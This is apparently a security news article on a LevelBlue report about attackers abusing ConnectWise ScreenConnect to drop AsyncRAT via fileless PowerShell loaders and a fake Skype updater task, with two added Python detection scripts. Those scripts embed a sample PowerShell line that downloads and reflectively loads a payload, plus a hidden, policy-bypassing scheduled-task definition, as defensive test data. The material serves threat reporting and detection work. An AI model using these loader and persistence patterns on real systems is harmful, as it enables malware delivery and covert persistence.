
Attackers abuse ConnectWise ScreenConnect to drop AsyncRAT


Hackers exploit ConnectWise ScreenConnect to drop AsyncRAT via scripted loaders, stealing data and persisting with a fake Skype updater.

LevelBlue researchers warn of a campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. Attackers use VBScript/PowerShell loaders and achieve persistence via a fake Skype updater.

ConnectWise ScreenConnect is a remote desktop and remote support software designed to enable secure, real-time access to computers and devices from anywhere. IT professionals, managed service providers (MSPs), and businesses widely utilize it to troubleshoot, maintain, and remotely manage endpoints.

The attack started from a compromised ScreenConnect client: the threat actors initiated an interactive session through a malicious domain (relay.shipperzone[.]online) linked to unauthorized ScreenConnect deployments.

A VBScript triggered PowerShell commands that fetched two payloads, stored them in the public folder, and executed them directly in memory. The attackers decoded and ran .NET assemblies directly in memory instead of saving executables to disk, using a classic fileless malware trick that makes detection and defense much harder.

“The two payloads, logs.ldk and logs.ldr, were downloaded from a remote server. These files were written to the C:\Users\Public\ directory and loaded into memory using reflection. The script converted the first-stage payload (logs.ldk) into a byte array and passed the second (logs.ldr) directly to the Main() method. The script retrieves encoded data from the web, decodes it in-memory, and invokes a method in a dynamically loaded .NET assembly,” reads the report published by LevelBlue.

“This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory.”
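The loading chain quoted above (remote fetch, staging under C:\Users\Public, byte-array conversion, reflective Assembly load, Main() invocation) leaves a recognisable footprint in PowerShell Script Block Logging (Event ID 4104). The following is an added detection example, not code from the LevelBlue report or from the malware: it scores constructed 4104-style records against indicator regexes that are my own assumptions, and alerts when several indicators co-occur or when a reflective load is paired with an entry-point invocation. The host names, record IDs and the payload host in the sample are constructed.

```python
import re

# Indicator regexes for the in-memory .NET loading chain described above.
# These patterns are my own assumptions for illustration, not signatures
# taken from the LevelBlue report.
INDICATORS = {
    "public_folder_staging": re.compile(r"C:\\Users\\Public\\", re.IGNORECASE),
    "remote_download": re.compile(
        r"\b(DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Invoke-RestMethod)\b",
        re.IGNORECASE),
    "byte_array_conversion": re.compile(
        r"(\[byte\[\]\]|FromBase64String|ReadAllBytes)", re.IGNORECASE),
    # Match Load( only: LoadWithPartialName('System.Windows.Forms') is routine admin use.
    "reflective_assembly_load": re.compile(r"Reflection\.Assembly\]::Load\(", re.IGNORECASE),
    "entrypoint_invoke": re.compile(
        r"(GetMethod\(\s*['\"]Main['\"]\s*\)|\.EntryPoint)\s*\.Invoke\(", re.IGNORECASE),
}

# Tuning knobs (assumptions): alert on three or more indicators, or on the
# strong pair "reflective load + entry-point invoke" regardless of count.
MIN_INDICATORS = 3
STRONG_PAIR = {"reflective_assembly_load", "entrypoint_invoke"}


def match_indicators(script_text: str) -> set:
    """Return the names of all indicators present in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_text)}


def is_suspicious(found: set) -> bool:
    return len(found) >= MIN_INDICATORS or STRONG_PAIR <= found


def triage(events: list) -> list:
    """events: dicts shaped like Script Block Logging records (Event ID 4104).
    Returns one alert dict per suspicious block; other event IDs are skipped."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        found = match_indicators(ev["script_block_text"])
        if is_suspicious(found):
            alerts.append({"host": ev["host"], "record_id": ev["record_id"],
                           "indicators": sorted(found)})
    return alerts


# Constructed sample records: two benign admin blocks, one non-4104 record,
# and one block mirroring the chain described in the report.
SAMPLE_EVENTS = [
    {"host": "ws-finance-07", "record_id": 1, "event_id": 4104,
     "script_block_text": r"Get-ChildItem C:\Users\Public\Documents | Measure-Object"},
    {"host": "ws-finance-07", "record_id": 2, "event_id": 4104,
     "script_block_text": r"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')"},
    {"host": "ws-finance-07", "record_id": 3, "event_id": 4103,
     "script_block_text": r"Invoke-WebRequest https://updates.example.invalid/a.zip -OutFile C:\Users\Public\a.zip"},
    {"host": "ws-finance-07", "record_id": 4, "event_id": 4104,
     "script_block_text": (
         r"$p='C:\Users\Public\logs.ldk';(New-Object Net.WebClient).DownloadFile('hxxp://<constructed-host>/logs.ldk',$p);"
         r"$b=[IO.File]::ReadAllBytes($p);$a=[System.Reflection.Assembly]::Load($b);"
         r"$a.GetType('Obfuscator').GetMethod('Main').Invoke($null,@(,$r))")},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Record 2 shows why the reflective-load pattern is anchored on `Load(`: a bare `Assembly]::Load` substring would also fire on `LoadWithPartialName`, which legitimate scripts use constantly. In production the same scoring runs over 4104 events pulled from the Windows event log or a SIEM rather than the embedded list.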

Obfuscator.dll is the first in-memory stage of the AsyncRAT infection chain. It launches execution, sets up persistence via a fake “Skype Updater,” and disables defenses like AMSI and ETW. The malware includes three core classes to handle initialization, dynamic payload loading, and anti-analysis tactics, ensuring stealth and preparing the system for the main payload.

AsyncClient.exe is the core C2 engine of the AsyncRAT attack chain. It decrypts config with AES-256, connects to C2 servers, and parses commands via a custom protocol. The malware gathers system and security details, monitors user activity with a keylogger, and exfiltrates sensitive data like browser extensions. The malware maintains persistence via scheduled tasks using the CreateLoginTask() function seen in Obfuscator.dll or redundantly recreated from AsyncClient.
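The persistence described in the two paragraphs above is a scheduled task whose name borrows a legitimate updater's identity but whose action runs a script host from a user-writable folder. The following is an added example, not code from the report or from AsyncRAT: it parses Windows scheduled-task XML (the format returned by `schtasks /query /xml`, which is UTF-16 on disk and is assumed here to have been decoded to a string already) and flags the combination of logon trigger, script interpreter, user-writable path, evasive flags and a vendor name that does not match the executed binary. The two task definitions, the thresholds and the keyword lists are constructed assumptions for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Heuristics (assumptions) for updater-impersonating scheduled tasks.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(
    r"(C:\\Users\\Public\\|\\AppData\\|\\Temp\\|%TEMP%|%APPDATA%|%PUBLIC%)", re.IGNORECASE)
EVASIVE_FLAGS = re.compile(
    r"-(w(indowstyle)?\s+hidden|e(p|xecutionpolicy)\s+bypass|enc(odedcommand)?)\b", re.IGNORECASE)
IMPERSONATED_VENDORS = ("skype", "microsoft", "google", "adobe", "onedrive", "teams")
MIN_FINDINGS = 3


def _local(tag: str) -> str:
    """Strip the XML namespace that task definitions carry."""
    return tag.split("}")[-1]


def parse_task(xml_text: str):
    """Return (trigger names, [(command, arguments), ...]) from task XML."""
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)  # drop UTF-16 declaration
    root = ET.fromstring(xml_text)
    triggers = [_local(t.tag) for trig in root.iter()
                if _local(trig.tag) == "Triggers" for t in trig]
    execs = []
    for el in root.iter():
        if _local(el.tag) != "Exec":
            continue
        cmd = args = ""
        for child in el:
            if _local(child.tag) == "Command":
                cmd = (child.text or "").strip()
            elif _local(child.tag) == "Arguments":
                args = (child.text or "").strip()
        execs.append((cmd, args))
    return triggers, execs


def assess_task(name: str, xml_text: str) -> dict:
    triggers, execs = parse_task(xml_text)
    findings = []
    if "LogonTrigger" in triggers or "BootTrigger" in triggers:
        findings.append("runs_at_logon_or_boot")
    for cmd, args in execs:
        exe = cmd.strip('"').replace("/", "\\").split("\\")[-1].lower()
        if exe in SCRIPT_HOSTS:
            findings.append(f"script_host:{exe}")
        if USER_WRITABLE.search(cmd + " " + args):
            findings.append("user_writable_path")
        if EVASIVE_FLAGS.search(args):
            findings.append("evasive_powershell_flags")
        # Task is named after a vendor but the executed binary is not that vendor's.
        vendors_in_name = [v for v in IMPERSONATED_VENDORS if v in name.lower()]
        if vendors_in_name and not any(v in cmd.lower() for v in vendors_in_name):
            findings.append("vendor_name_mismatch")
    return {"task": name, "findings": findings, "suspicious": len(findings) >= MIN_FINDINGS}


# Constructed baseline: a plausible vendor updater living under Program Files.
VENDOR_UPDATER_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Keeps Skype up to date</Description></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Skype\Updater\Updater.exe</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed look-alike modelled on the persistence pattern described above.
FAKE_UPDATER_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Skype Updater</Description></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -ep bypass -File C:\Users\Public\SkypeUpdater.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for task_name, xml in (("Skype Updater", VENDOR_UPDATER_XML), ("Skype Updater", FAKE_UPDATER_XML)):
        print(assess_task(task_name, xml))
```

The logon trigger alone is not a signal, since genuine updaters use it too; the check only becomes meaningful when it is combined with a script host, a user-writable script path and a name that does not match the binary actually being run. Because the report notes the task is recreated redundantly from AsyncClient, the same assessment should be re-run periodically rather than once at task creation.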

“Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution,” concludes the report. “This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate.”


Pierluigi Paganini

(SecurityAffairs – hacking, AsyncRAT)